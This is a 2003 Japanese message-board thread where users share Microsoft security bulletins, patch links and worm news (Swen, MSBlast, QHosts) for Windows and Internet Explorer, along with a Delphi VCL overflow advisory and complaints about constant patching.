その3 http://memo.st.ryukoku.ac.jp/archive/200309.month/6371.html

(一般ユーザにも対処できる方法なのでその3を抜粋)
C:\> telnet <proxyのホスト名> <proxyのport>
GET http://office.microsoft.com/productupdates/content/opuc.cab HTTP/1.0
Host: office.microsoft.com
Pragma: no-cache

と、叩くと Squid の管理権限がなくても このファイルだけ Update できます。
# 最後の空行も入れてください。
743名無しさん@お腹いっぱい。:03/09/16 20:36 ID:jurfUb6Q
保守デスヨ
744名無しさん@お腹いっぱい。:03/09/17 03:26 ID:???
マイクロソフトのウイルス騒ぎにはもうウンザリ
http://japan.cnet.com/news/pers/story/0,2000047682,20060471,00.htm
745名無しさん@お腹いっぱい。:03/09/19 08:32 ID:???
“No more MSBlast”――悪用コードの公開を受け政府、業界がパッチ適用を呼びかけ
http://www.zdnet.co.jp/enterprise/0309/18/epn21.html
746窓板住人 ◆winDOwS0aE :03/09/22 23:58 ID:???
2年前の脆弱性を突いた新ウイルスが拡散

2年前に発見されたInternet Explorer(IE)の脆弱性に付け込む新型ワームが急速に拡散している。
このワームは「Swen」「Gibe.F」などの名称で呼ばれ、Microsoftが2001年3月のセキュリティ速報で
公表した脆弱性を利用しているようだ(2001年4月の記事参照)。

http://www.zdnet.co.jp/enterprise/0309/19/epn03.html
747名無しさん@お腹いっぱい。:03/09/23 14:17 ID:???
>>746
こいつは今のところ、NetNewsで拾ったアドレスだけにばら撒いてる
ってとこで可愛げがあるんだけど、破壊力は凄まじいです。多くの
2ちゃんねらは関わり合いが無いみたいだから、あまり話題にならない
けどね。

少ない私でも一日100通オーバー、多い人だと千通オーバーの
ウイルス付き大容量メールが送信されるので、メールスプール溢れ
まくり。ダイヤルアップでメール受信してる人なんかは、((;゚Д゚)ガクガクブルブル
ですな。

BLAST系も増加してるみたいだし、今年は間違いなく最悪の年です。
748窓板住人 ◆winDOwS0aE :03/09/23 16:19 ID:???
Protect Your PC - PCを守るための3つの手順
http://www.microsoft.com/japan/security/protect/default.asp?&SD=GN&LN=JA&gssnb=1
749名無しさん@お腹いっぱい。:03/09/25 15:11 ID:???
「マイクロソフトの支配が、国家安全保障の脅威に」:米業界団体報告書
http://japan.cnet.com/news/ent/story/0,2000047623,20061069,00.htm
750窓板住人 ◆winDOwS0aE :03/09/26 22:38 ID:???
Delphi に付属する VCL にバッファオーバーフロー。
http://memo.st.ryukoku.ac.jp/archive/200309.month/6508.html

概要:
-----
Delphi は Borland の提供する Windows アプリケーションの統合開発環境です。
Delphi に付属するクラスライブラリ VCL に含まれる
TComboBox (コンボボックスを抽象化したクラス)
TListBox (リストボックスを抽象化したクラス)
TToolBar (ツールバーを抽象化したクラス)
TListView (リストビューを抽象化したクラス)
の各クラスにはバッファオーバーフローを引き起こすバグがあることがわかり
ました。

このバッファオーバーフローにより Delphi によって作成されたアプリケーシ
ョンには、任意のコードが実行可能なセキュリティホールが存在し得ます。

確認したバージョン:
-------------------
Delphi 3.1 Profesional
Delphi 5 Profesional
Delphi 6 Personal (TListBox は問題なし)

その他のバージョンについては該当するかどうか未確認です。

窓板住人注:C++Builderにも同様の脆弱性を有する可能性は否定できません。
ご注意下さい。
751窓板住人 ◆winDOwS0aE :03/09/26 22:40 ID:???
Office のアップデートの不具合と回避策について
最新更新日: 9/19/2003
http://www.microsoft.com/japan/office/security/

概要
「Office のアップデート」を実行すると、下記のような画面が表示され、
「Office のアップデート」を先に進めることができなくなることがあります。
この現象については、全てのユーザにあてはまる現象ではございません。
この現象が起こった場合には、「回避方法」を参照し、セキュリティ アップデート
をインストールすることができます。
この現象につきましては、現在弊社にて調査中です。
752窓板住人 ◆winDOwS0aE :03/09/26 22:42 ID:???
Windows Update 総合情報
http://www.microsoft.com/japan/support/wuinfo/default.aspx

「Windows Update 総合情報」は、Windows Update の使用方法などの基礎知識から、
現在発生している Windows Update に関連する不具合、またお客様よりよく寄せられる
質問とその回答など、Windows Update に関する全ての情報を提供するサイトです。

「Windows Update の基礎知識」では、Windows Update の説明と、その使用方法など
についての情報をご確認いただけます。

「Windows Update に関するトラブル情報」では、最新のトラブル情報や、お客様から
よく寄せられる質問、また Windows Update に関する技術情報一覧などをご確認
いただくことができます。
753窓板住人 ◆winDOwS0aE :03/09/26 22:50 ID:???
マイクロソフト サポート技術情報 - 827667
[IE] Q822925 (MS03-032) を適用すると相対 URL を使用したスクリプトで
HTTP 404 エラーが発生する
http://support.microsoft.com/default.aspx?scid=kb;ja;827667

現象
マイクロソフト セキュリティ情報 MS03-032 に記載されている Internet Explorer 用
の累積的なセキュリティ修正プログラム(Q822925)を適用した後、これまで動作していた
スクリプトが正しく動作しなくなり、フレームやウィンドウでスクリプトを実行した際に次の
エラーメッセージが表示されることがあります。
「HTTP 404 - ファイル未検出」

この問題は、次の場合に発生します。
・フレームやウィンドウから他のページ内のスクリプトをコールしている
・呼ばれた側のページのスクリプトで相対 URL を使用している
・呼んだ側のページの URL と呼ばれた側のページの URL のパスの階層が異なる

原因
Internet Explorer は、これまで相対 URL は呼んだ側の URL を基準にしていましたが、
誤った Q822925 の修正により、呼ばれた側の URL が基準とされるようになったため、
相対 URL でアクセスしようとした先のコンテンツが見つからず、HTTP 404 エラーが発生します。
754窓板住人 ◆winDOwS0aE :03/09/26 23:04 ID:???
なお、MS03-032の修正プログラムにおける既知の問題は >>753 の他に下記が報告されています。
詳細はKB 822925( http://support.microsoft.com/default.aspx?scid=kb;ja;822925 )を参照してください。

・マイクロソフト サポート技術情報 827641
[BUG] セキュリティ修正プログラム MS03-032 をインストール後、ASP.NET で
"Server Not Available" というエラー メッセージが表示される
http://support.microsoft.com/default.aspx?scid=kb;JA;827641
・MS03-032修正HotFixのアンインストールでエラーが発生する
・Windows Server 2003 または Windows XP 64-Bit Edition Version 2003 を実行する
コンピュータで IEの累積的な修正のアンインストールの順番に制限あり
・Windows 2000/XP に重要な更新 822925 をインストールした後に、重要な更新 813489
または 818529 をインストールすることが禁止されないためセキュリティホールのある
ファイルに置き換わる問題。822925HotFixを再度インストールすることにより解決。
・IE 5.01 SP3 を実行する Windows 2000 SP3 ベースのコンピュータに重要な更新
822925 の IE 5.5 SP2 用修正プログラムをインストールすることが禁止されない問題。
対処は重要な更新 818529 の IE 5.5 SP2 用パッケージをツールを用いて削除したうえで、
重要な更新 818529 の IE 5.01 SP3 用修正プログラムをインストールする。
詳細はKB822925を参照。
・Windows XP/2000/NT/Me/98SE を実行するコンピュータでは、重要な更新 818529
を削除した後、Internet Explorer 用の以前の累積的な修正プログラム (重要な更新 813489 など)
を削除することはできない。(仕様)
755窓板住人 ◆winDOwS0aE :03/09/26 23:11 ID:???
その他雑多な情報

マイクロソフト サポート技術情報 - 825062
(Windows 2000) Service Pack 4 では回復コンソールを使用して Service Pack を削除できる
http://support.microsoft.com/default.aspx?scid=kb;ja;825062

マイクロソフト サポート技術情報 - 823862
Windows 2000 SP4 を実行しているコンピュータへのログオン時、ユーザー ポリシーが適用されない
http://support.microsoft.com/default.aspx?scid=kb;ja;823862

マイクロソフト サポート技術情報 - 262839
Windows 2000 Service Pack Update.exe のコマンドライン スイッチ
http://support.microsoft.com/default.aspx?scid=kb;ja;262839
(SP3 SP4からスイッチが追加されています)
756ぼるじょあX ◆VRZZDWo8Vw :03/09/30 10:15 ID:???
ユーザー固有のフォルダが開かれる現象について
http://support.microsoft.com/default.aspx?scid=kb;ja;829493
757名無しさん@お腹いっぱい。:03/09/30 12:44 ID:ijt12suB
最近のMS必死だなw
758ちか:03/09/30 18:43 ID:???
ココ、イイぜ!
http://m-no1.jp/a.php?w=26
759名無しさん@お腹いっぱい。:03/10/01 22:50 ID:???
いや、ダメだったよ。
760名無しさん@お腹いっぱい。:03/10/02 06:11 ID:???
WIN98で6.0使ってる場合、
パッチ全部当ててたら、
fusianaトラップを回避できるのか?
761窓板住人 ◆winDOwS0aE :03/10/02 22:15 ID:???
>>760
2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/bulletin/MS02-005.asp
を適用すればfusianasanトラップ、いわゆる「ユーザーがスクリプトを無効にして
いる場合でも、Web ページがスクリプトを実行することができる脆弱性」を回避
できますが、全てのパッチを適用することをお勧めします。
というか、すでに98は新たに見つかった脆弱性に対するHotFixは無償では提供
されないはずなので、有償サポートを受けるか、より新しいOSに更新されることを
お勧めします。

なお、単に名前欄にfusianasanと入れるとIPが出るのは「2ちゃんねるの仕様」となっております。
762窓板住人 ◆winDOwS0aE :03/10/02 22:17 ID:???
サポート情報 - ウイルスバスター2002 製品サポートの終了について
http://www.trendmicro.co.jp/support/news.asp?id=310

ウイルスバスター 2003 リアルセキュリティおよびウイルスバスター2004
インターネットセキュリティの発売に伴い、ウイルスバスター2002に関する
サポートを2003年12月末日をもって終了させていただきます。
(略)
また、ウイルスバスター2002のサポート終了に伴い、以下のOSについても
サポートを終了させていただきます。ウイルスバスター2003 リアルセキュリティ
およびウイルスバスター2004 インターネットセキュリティでは動作保証外と
なりますのでご注意ください。
Microsoft(R) Windows95 (OSR2を含む)

注意:
ウイルスバスター2004 インターネットセキュリティでは、
Microsoft(R) WindowsNT環境についても動作保証いたしません。
763760:03/10/03 18:45 ID:???
>>761
そうなのかぁー。
非常に参考になりました。
今日、98のパッチの329414が新しく出たけど、これでも無理なのかな?
764名無しさん@お腹いっぱい。:03/10/03 20:49 ID:???
>>763
> 今日、98のパッチの329414が新しく出たけど、これでも無理なのかな?
だから、fusianasanは2chの仕様。
765760:03/10/03 22:52 ID:???
>>764
キミは勘違いしているようだが、
漏れの言ってるのは、あるリンクを踏むと
どこかのスレに勝手に自分がfusianaさんで勝手に
書き込みされるという、ありえないトラップの事なのだ。
766窓板住人 ◆winDOwS0aE :03/10/03 23:26 ID:???
>>763 329414ってMDACのセキュリティホールの件のはずなんだけど、
これってとっくにパッチ出てるはず何だけど・・・どっちにしろ関係ないと思われ。
累積的な修正プログラムじゃない限り、以前の修正プログラムは内包されないはずだから。
767名無しさん@お腹いっぱい。:03/10/03 23:29 ID:???
スクリプトによる自動POSTやIMGタグやハイパーリンクからのWEBバグの事言ってるならそれも仕様。
OSでどーにか出来る問題じゃない。設定を変える事でで回避する事は出来るが。
嫌ならスクリプト切って画像を表示しないようにしてリンクは踏まない様にしとくこと。
768名無しさん@お腹いっぱい。:03/10/03 23:51 ID:???
>>766
漏れもびっくりしたんだが、何故1年前のパッチが
今頃通知されたんだろう?
最近悪用されてるのかな?
769768:03/10/03 23:57 ID:???
オフィス2000のSP3をこの前入れたからかな?
770窓板住人 ◆winDOwS0aE :03/10/04 00:50 ID:???
>>768-769 わからん。まぁいいじゃないか。

エンタープライズ:ニュース 2003/10/03 07:31:00 更新
DNSに影響、パッチ未発行の脆弱性を悪用するトロイの木馬「QHosts」
http://www.zdnet.co.jp/enterprise/0310/03/epn04.html

まだパッチが提供されていないIEのセキュリティホールを悪用するトロイの木馬
「QHosts」が登場した。PCのDNS設定が大きく変更され、特定のWebサイトに
誘導されるおそれがある。
日本時間の10月2日未明より、複数のセキュリティ関連メーリングリストで、不正な
形式のDNSパケットが異常に増加し、中にはタイムアウトが発生してWebサイトへ
のアクセスが困難になるケースもあるとの報告が寄せられた。SANSのInternet
Storm Centerでもこの兆候をつかみ、情報を公開している。またCERT/CCもこの
兆候を踏まえ、ドキュメントを公開している。
これまでの情報を総合すると、一連の現象を引き起こした犯人は、新種のトロイの
木馬「QHosts」(QHosts-1)と見られる。このトロイの木馬は、Internet Explorer(IE)
5.01/5.5/6を搭載した広範なWindowsプラットフォームに感染するという。
771名無しさん@お腹いっぱい。:03/10/04 02:21 ID:???
>>770
毎度おつかれさん
772名無しさん@お腹いっぱい。:03/10/04 15:50 ID:qZzKuZp0
MS03-040 に関する情報
「MS03-040: Internet Explorer 用の累積的な修正プログラム (828750) 」に
関する要約情報です。

概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS03-032: Internet Explorer 用の累積的な修正プログラム
(822925) で修正された問題に加えて、新たに 2 つの問題を排除します。

影響を受ける製品
================
・Microsoft Internet Explorer 6.0 for Windows Server 2003
・Microsoft Internet Explorer 6、6 Service Pack 1
・Microsoft Internet Explorer 5.5 Service Pack 2
・Microsoft Internet Explorer 5.01 Service Pack 3 または Service Pack 4
for Windows 2000

773名無しさん@お腹いっぱい。:03/10/04 15:52 ID:qZzKuZp0
修正プログラム
==============
・Internet Explorer 6 Service Pack 1 (WU)
http://download.microsoft.com/download/A/F/6/AF6F74C4-81D5-43B8-93F4-7FB9959C4AB7/q828750.exe

・Internet Explorer 6 Service Pack 1 for Windows Server 2003 (WU)
http://download.microsoft.com/download/3/9/E/39E995C4-303C-46CF-9528-1569C176BA88/WindowsServer2003-KB828750-x86-JPN.exe
この修正プログラムは Windows Server 2003 専用になります

・Internet Explorer 6 (WU)
http://download.microsoft.com/download/7/9/E/79EEFE32-83C2-46D0-99C1-F3FD8EF22843/q828750.exe
この修正プログラムは Windows XP (Service Pack 無し) にインストールできま
す。

・Internet Explorer 5.5 Service Pack 2 (WU)
http://download.microsoft.com/download/D/4/7/D4757318-9C9B-4016-A67C-AFEB69E9D342/q828750.exe

・Internet Explorer 5.01 Service Pack 3 または Service Pack 4 (WU)
http://download.microsoft.com/download/C/5/F/C5FA09EC-1035-4A85-AD1F-5E279DC439E3/q828750.exe
この修正プログラムは Windows 2000 SP3 または Windows 2000 SP4 の環境に
インストールすることができます。

774名無しさん@お腹いっぱい。:03/10/04 15:53 ID:qZzKuZp0
注意:
64bit 版の Windows をお使いのお客様は、次の修正プログラムの適用をお願いいたします。

・Windows XP Internet Explorer 6 SP1 (64bit) (WU)
http://download.microsoft.com/download/B/B/2/BB27B5C4-DF5E-417C-9D40-E488A23E7F19/q828750.exe

・Windows Server 2003 Internet Explorer 6 Service Pack 1 (64bit) (WU)
http://download.microsoft.com/download/B/F/6/BF6EF58A-F070-4152-8493-C72EB5554046/WindowsServer2003-KB828750-ia64-JPN.exe

(WU) のマークの付いている修正プログラムは Windows Update からインストールすることもできます。
修正プログラムのダウンロード、または、インストール方法については次のサイトを参照ください。
・修正プログラムのダウンロード方法
http://www.microsoft.com/japan/security/square/guard/a04g16.asp
・修正プログラム インストール方法
http://www.microsoft.com/japan/security/square/guard/a04g17.asp
775名無しさん@お腹いっぱい。:03/10/04 15:56 ID:qZzKuZp0
詳細
====
この修正プログラムをインストールすることにより、悪意のあるユーザーによる
以下の攻撃を防ぐことができます。

(緊急) Internet Explorer が Web サーバーから返されたオブジェクトの種類を
適切に確認できない問題により、ユーザーのコンピュータで任意のプログラムが
実行される可能性があります。
(緊急) Internet Explorer が XML データの処理中に Web サーバーから返された
オブジェクトの種類を適切に確認できない問題により、
ユーザーのコンピュータで任意のプログラムが実行される可能性があります。

対策が行われていないシステムがインターネットなどのネットワークを通じて他
のコンピュータと接続している場合、この問題を悪用した攻撃を受けることがあ
ります。この攻撃は、受動的攻撃という悪意のあるユーザーから送られた HTML
形式の電子メールからも攻撃を受ける可能性があります。この攻撃は、ハッカー
またはクラッカーと呼ばれる悪意のあるユーザーや、ワームといった自動的な攻
撃を目的とした悪意のあるプログラムから行われることがあります。

この脆弱性を悪用されることにより、以下のような実害を受ける事が考えられます。

・実行する意図の無いアプリケーションが動作させられる可能性があります
(ハードディスクのフォーマットやワームなど)
・アプリケーションが異常終了させられる可能性があります。
・意図しないスクリプトが動作させられる可能性があります。

日本語による詳細については、ただいま準備中です。それまでの間、英語情報をご参照ください。
・MS03-040: Cumulative Patch for Internet Explorer (828750)
http://www.microsoft.com/technet/security/bulletin/MS03-040.asp
イラストを交えたセキュリティ情報は以下をご覧ください。
・MS03-040: Internet Explorer の重要な更新
http://www.microsoft.com/japan/security/security_bulletins/MS03-040e.asp
776窓板住人 ◆winDOwS0aE :03/10/04 16:13 ID:???
>>772->>775は、
http://www.microsoft.com/japan/technet/security/bulletin/ms03-040.asp
ですね。
しかも、>>770問題を防御するものです。
777窓板住人 ◆winDOwS0aE :03/10/04 16:40 ID:???
勝手に >>772-775 の続き
技術的な説明 :
これは累積的な修正プログラムで、("Internet"が脱字してます)Explorer 5.01、
5.5 および 6 用に以前にリリースされたすべての修正プログラムを含みます。
また、新たに確認された次の脆弱性を排除します。
・IEがPopup Windowの呼び出し時に、Web サーバーから返されたObject Typeを、
適切に判断をしないために発生する脆弱性。この脆弱性を悪用されると、攻撃者
により任意のコードがユーザーのシステムで実行される可能性があります。(略)
・IEが XML データ接続を行っている間、Web サーバーから返されたObject Typeを、
適切に判断をしないために発生する脆弱性。この脆弱性を悪用されると、攻撃者
により任意のコードがユーザーのシステムで実行される可能性があります。(略)
さらに、IEが、エクスプローラ 制限ゾーンの範囲内でダイナミック HTML (DHTML)の
動作を処理する手順が変更を受けました。これにより、攻撃者が上で説明した
二つの独立した脆弱性のいずれかを悪用しても、IEのインターネット ゾーンの
セキュリティコンテキストで実行されてしまう可能性があります。 また、攻撃者が
攻撃を仕組むためにWindows Media Player (WMP) を悪用することが考えられます。
さらに、攻撃者がこの脆弱性を悪用するために、HTML 形式の電子メールが作成
される可能性があります。
(略)
このセキュリティ修正プログラムを適用することに加えて、サポート技術情報
828026 (日本語版は準備中) で紹介されている Windows Media Player の更新も
同時にインストールすることを推奨します。この更新プログラムは、ダウンロード
センターと同様に、Windows Update からも現在サポートされている全ての Windows
Media Player に関して入手可能です。これはセキュリティ修正プログラムでは
ありませんが、DHTML の動作を悪用した攻撃から URL を開かれることを防御する
ための Windows Media Player に関する動作の更新が含まれています。特に、
他のセキュリティ ゾーンからローカル コンピュータ ゾーンの中の URL を開かれる
処理を制限します。
778窓板住人 ◆winDOwS0aE :03/10/04 16:48 ID:???
マイクロソフト サポート技術情報 - 828026
Windows Media Player Script Command Patch
http://support.microsoft.com/default.aspx?scid=kb;EN-US;828026

SUMMARY
Microsoft has released an update to Windows Media Player. This article
discusses the issues that the update fixes, and how to obtain this update.

1. The code now recognizes three registry keys. These keys would be
found under HKEY_CURRENT_USER\SOFTWARE\Microsoft\MediaPlayer\Preferences.
This patch does not create these keys. If the keys do not exist,
the default value is used.

 a. PlayerScriptCommandsEnabled ? Turns on/off URL script commands in
the standalone player. Default is OFF.
 b. WebScriptCommandsEnabled ? Turns on/off URL script commands in
the embedded player. Default is ON.
 c.URLAndExitCommandsEnabled ? Turns on/off URLAndExit script commands.
Default value is ON.
779窓板住人 ◆winDOwS0aE :03/10/04 16:48 ID:???
2. In addition to the registry keys, logic was added so that URL script
commands can not take the user from a less trusted zone to a more trusted zone.
The zone of origin is either the zone of the content being played, or
the web page the player is embedded in, which ever is less trusted.
The destination zone is the zone of the URL flip. The table below represents
this graphically. The vertical axis represents the zone of origin.
The horizontal axis is the destination zone.

Zone        Local Machine Intranet Trusted Internet Untrusted
Local Machine
Intranet         X
Trusted         X        X
Internet         .X        X     X
Untrusted        .X        .X     X     X     X
X = URL is not launched
780名無しさん@お腹いっぱい。:03/10/06 12:57 ID:1S7xgccm
781名無しさん@お腹いっぱい。:03/10/06 13:28 ID:y2p20u2k
閲覧ソフトに不具合 マイクロソフト「IE」

 【ニューヨーク5日共同】米ソフトウエア最大手マイクロソフトは5日までに、閲覧ソフト「インターネット・エクスプローラー」(IE)に安全上の不具合が見つかったと発表、同社ホームページを通じてソフトを更新するよう呼び掛けた。
 対策の重要度は4段階のうち最高の「緊急」でIE「5・01」、同「5・5」、同「6・0」が対象。ハッカーなどがあらかじめ細工したホームページにアクセスすると、外部からパソコンを不正操作される恐れがあるとしている。(共同通信)
782名無しさん@お腹いっぱい。:03/10/06 14:22 ID:???
またかよ.....
783名無しさん@お腹いっぱい。:03/10/06 16:03 ID:???
遅杉
784名無しさん@お腹いっぱい。:03/10/06 16:05 ID:CRsHS3o3
785名無しさん@お腹いっぱい。:03/10/06 17:09 ID:???
わけわからん。
金あんねやから
『これ最強2003.10.6』
『うちもコレ2003.10.6』
『03.10.6ゲイツも入れたばっか』
とかってファイル名にして欲しい。
786名無しさん@お腹いっぱい。:03/10/06 19:05 ID:GpuCfLCc
Windows Update したら、更新しなければいけないと出たものが、
IE6だけだった。Win98 IE5.01 の漏れには関係ないのですか?
787名無しさん@お腹いっぱい。:03/10/06 19:11 ID:???
IEをOSに統合してまで、他のブラウザ潰ししてこれですか?
ドザは悔しくないのですか?
毎日そんなに暇ですか?
友達いますか?
788名無しさん@お腹いっぱい。:03/10/06 19:20 ID:???
悔しいけど、今更マックでもないだろ、と釣られてみる。
789名無しさん@お腹いっぱい。:03/10/06 19:31 ID:???
漏れマカーだけど、MacはどうでもいいからちゃんとしたWindowsOS出て欲しい。
790名無しさん@お腹いっぱい。:03/10/06 19:47 ID:???
>>787
> IEをOSに統合してまで、他のブラウザ潰ししてこれですか?

他のブラウザ潰すためにIEをOSに統合した結果、こんな阿鼻叫喚の状態になりました。
791名無しさん@お腹いっぱい。:03/10/06 19:55 ID:???
>787
すんません。ドザって誰?
792名無しさん@お腹いっぱい。:03/10/06 22:13 ID:???
水死した人のことだよ
793名無しさん@お腹いっぱい。:03/10/06 22:43 ID:???
DOS USER のこと。
794窓板住人 ◆winDOwS0aE :03/10/06 22:52 ID:n/sq9heV
>>780-787 あの、みなさん?このニュースって>>772-779なんですけど、、、
795窓板住人 ◆winDOwS0aE :03/10/06 22:55 ID:n/sq9heV
マイクロソフト サポート技術情報 - 824208
自動更新機能で修正プログラムがダウンロードされずイベント ID 16 がログに出力される
http://support.microsoft.com/default.aspx?scid=kb;ja;824208
796窓板住人 ◆winDOwS0aE :03/10/07 21:27 ID:???
トラブル・メンテナンス速報
http://support.microsoft.com/japan/support/sokuho/default.asp#Record_74

Office のアップデートの不具合と回避策
更新日: 2003/10/6

「Office のアップデート」を実行すると、"Warning You are viewing this page with an...."
というメッセージが表示され、「Office のアップデート」を先に進めることができなくなる現象
が一部のお客様の環境で確認されておりましたが、この問題の修正が完了致しましたので
ご報告いたします。

ご迷惑をおかけしてしまい、大変申し訳ございませんでした。
797窓板住人 ◆winDOwS0aE :03/10/07 21:33 ID:???
以下は、更新情報です。念のため。

HTML コンバータのバッファ オーバーランにより、コードが実行される (823559) (MS03-023)
登録日 : 2003/07/10 更新日 : 2003/10/06
http://www.microsoft.com/japan/technet/security/bulletin/MS03-023.asp

深刻度 :
Windows 98 緊急
Windows 98 Second Edition 緊急
Windows Me 緊急
Windows NT Server 4.0 緊急
Windows NT Server 4.0, Terminal Server Edition 緊急
Windows 2000 緊急
Windows XP 緊急
Windows Server 2003 警告

警告 :
本修正プログラムのインストール後 Internet Explorer 6 Service Pack 1 に
アップグレードしたお客様は、再度本修正プログラムをインストールする必要が
あります。修正プログラムは本ページの 「修正プログラム」 の欄で紹介されている
ダウンロード サイト、または Windows Update のサイトから入手することができます。

更新履歴 :
2003/10/06: 「警告」 の欄を更新し、本修正プログラムのインストール後
Internet Explorer 6 Service Pack 1 にアップグレードしたお客様は、再度
本修正プログラムをインストールする必要があることを追加しました。
798窓板住人 ◆winDOwS0aE :03/10/07 21:34 ID:fYXaYCZI
ZDNN:WindowsへのJava搭載、2004年9月まで延長
http://www.zdnet.co.jp/news/0310/07/xert_msjava.html

米Microsoftは10月7日、Sun MicrosystemsのJavaプログラミング言語を
Windowsに搭載する期間を、当初の計画から9カ月延長し、顧客がソフトウェア
プラットフォームを移行するための期間を引き伸ばすことを明らかにした。

同社は当初、Javaで書いたプログラムをWindows上で走らせるための契約に
基づいて、2003年末でWindowsへのJava搭載を終了する予定だった。
同社とSunは、これを2004年9月30日まで延長するとの共同声明を発表した。
799あぼーん:あぼーん
あぼーん
800名無しさん@お腹いっぱい。:03/10/08 13:55 ID:???
800ゲット
801名無しさん@お腹いっぱい。:03/10/08 14:29 ID:tEFMeWrm
>>797
ありがとうございます。
>本修正プログラムのインストール後 Internet Explorer 6 Service Pack 1 に
>アップグレードしたお客様は、再度本修正プログラムをインストールする必要が
>あります。

これ知りませんでした。
802名無しさん@お腹いっぱい。:03/10/08 17:02 ID:???
>>796
> ご迷惑をおかけしてしまい、大変申し訳ございませんでした。

MSがこの文言を掲出するのは、すごく珍しいのでは?
803名無しさん@お腹いっぱい。:03/10/08 19:26 ID:???
そうとも言えるが、その前にあるべき謝罪がまったくないからね。
脳内誤変換です。もしくは、辞書登録です。
804名無しさん@お腹いっぱい。:03/10/08 20:10 ID:mdDxzcnX
2日まえ、ウインドウズアップデイトしたら、
jpegファイルを、ふつうにウインドウでみて拡大すると
3段階目でフリーズするようになってしまった。
805名無しさん@お腹いっぱい。:03/10/08 22:47 ID:80WsmHsR
これもその内、Updateするのかな?
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20031008/3/
806窓板住人 ◆winDOwS0aE :03/10/09 21:59 ID:???
■ Adobe SVG Viewer (ASV) Windows 版の 3.0 以前に 3 つの欠陥 (various)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/10.html#20031008_ASV

セキュリティホールmemoによれば、Adobe SVG Viewer (ASV) Windows 版の
3.0 以前に 3 つの欠陥があるとのことです。

Adobe SVG Viewerは、WebブラウザでSVGをレンダリングするためのプラグインです。
SVGとはScalable Vector Graphicsの略から来る、拡大縮小が綺麗に行え、機械可読
可能なWebに適したXML形式で記述される新しい画像形式のことで、W3Cによって
規格がとりまとめられています( http://www.w3.org/Graphics/SVG/ )。

欠陥は、Adobe SVG Viewer (ASV) 3.01 for Windows で修正されており、
http://www.adobe.com/svg/viewer/install/mainframed.html から入手できます。
上記ページにはいくつかのバージョンがあり、また、日本語サイトの方ではバージョン3.0
しかまだ提供されていないようですのでご注意下さい。
807名無しさん@お腹いっぱい。:03/10/10 12:20 ID:???
MSが不具合を出すたびに700円貰えてたら今頃大金持ちだぜ
808名無しさん@お腹いっぱい。:03/10/11 16:04 ID:???
ttp://pc.watch.impress.co.jp/docs/2003/1010/ms.htm
>Microsoft、Windows XP SP2に新セキュリティ技術
>〜修正プログラム適用前でも攻撃から防御可能に

信じていいのかな?
809名無しさん@お腹いっぱい。:03/10/11 17:16 ID:???
必要な物だけを起動させるのでは?
810名無しさん@お腹いっぱい。:03/10/12 01:00 ID:ntEnCsA0
こんなのも出てるな。
http://www.st.ryukoku.ac.jp/~kjm/security/m..rchive/full-disclosure/2003.10/msg00711.html

> Security Community,
>
> The following information references a serious security threat to you or
> your organization if the proper measures have not been taken to prevent
> its destructive intent.
>
> Description of Issue
> --------------------
> VigilantMinds has successfully validated the claims regarding the latest
> Microsoft Remote Procedure Call (RPC) vulnerability. Specifically,
> VigilantMinds has validated that hosts running fully patched versions of
> the following Microsoft operating systems REMAIN subject to denial of
> service attacks and possible remote exploitation:
>
>   * Microsoft Windows XP Professional
>   * Microsoft Windows XP Home
>   * Microsoft Windows 2000 Workstation
>
> Although it has not been verified at this time, other versions of
> Microsoft Windows are also suspected to be subject to this
> vulnerability.
>
> As with the prior RPC vulnerability (MS03-039), these attacks can occur
> on TCP ports 135, 139, 445 and 593; and UDP ports 135, 137, 138 and 445.

既出の全パッチを当てていても例の RPC/DCOM 穴 (MS03-039) はまだ残り
DoS 攻撃のほか任意コードの実行も可能だろうとの事。
811名無しさん@お腹いっぱい。:03/10/12 01:32 ID:HgAmNdgR
Shields Up!のSteve Gibson作DCOM無効化ユーティリティー
http://grc.com/dcom/
ボタンを押すだけでDCOMの有効/無効を切り替えられる。
あてにならないMSのパッチ当てるよりまずDCOM無効化が吉

812窓板住人 ◆winDOwS0aE :03/10/15 22:53 ID:???
後を絶たないIEのセキュリティ・ホール,設定変更などで“自衛”を
続々見つかるパッチの不具合,パッチ未公開のホールを狙うウイルスも
今週のSecurity Check [Windows編] (第105回,2003年10月15日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031014/1/
813名無しさん@お腹いっぱい。:03/10/16 12:45 ID:???
でた〜〜〜〜〜〜
『Windowsに5種類の危険なセキュリティ・ホール,Windows Updateの実施を』
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031016/135619/
814名無しさん@お腹いっぱい。:03/10/16 19:20 ID:???
>>813
窓ウプデトしたら、いきなり5個位更新されててちょっとびっくり。
815窓板住人 ◆winDOwS0aE :03/10/16 23:21 ID:???
MSのサイトから要約を持ってこようかとも思ったのですが、
セキュリティホールmemoが良くまとまっているし、MSのサイトは誰もが
見るべきと言うことで、セキュリティホールmemoのリンク先だけ書いておきます。
ああ、もちろん>>813の件です。

■ 木曜日は Windows Update の日 (今月から月刊 Windows Update)
(Microsoft, 2003.10.16)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/10.html#20031016_wu
816名無しさん@お腹いっぱい。:03/10/18 03:41 ID:???
457 名前:名無しさん@4周年 投稿日:03/10/17 20:42 ID:sDNC94iF
 インターネット上のwebサーバはWindowsよりUNIX系OSで立てた物が多いが
ここまで修正パッチに追われることも、頻繁にワームに感染して無駄なトラフィック
を垂れ流すこともない。

 一方Windowsのセキュリティ問題はOS構造そのものに起因しているので、一から
作り直さない限り、このセキュリティパッチ充て地獄からは逃れられない。

 IEのような一ネットワークアプリをOSにくくりつけるのを止めるだけでも、安全度は
飛躍的にアップすると思われるが、独禁法のがれのためにIEはOSの一部と言い切って
しまった以上、いまさらOSとIEを切り離すことはできない。

 仕方がないのでMSは定期アップデイトという対処療法をユーザーに押しつけることにした。
817名無しさん@お腹いっぱい。:03/10/18 10:28 ID:???
ホントは対症療法って言わない?
818名無しさん@お腹いっぱい。:03/10/18 12:05 ID:???
くううううううっっっっっ。
819名無しさん@お腹いっぱい。:03/10/18 15:31 ID:???
地獄ってホドでもないけど。
820名無しさん@お腹いっぱい。:03/10/18 17:31 ID:A9mbA4aM
システム管理担当はまさに地獄につきおとされているワケだが
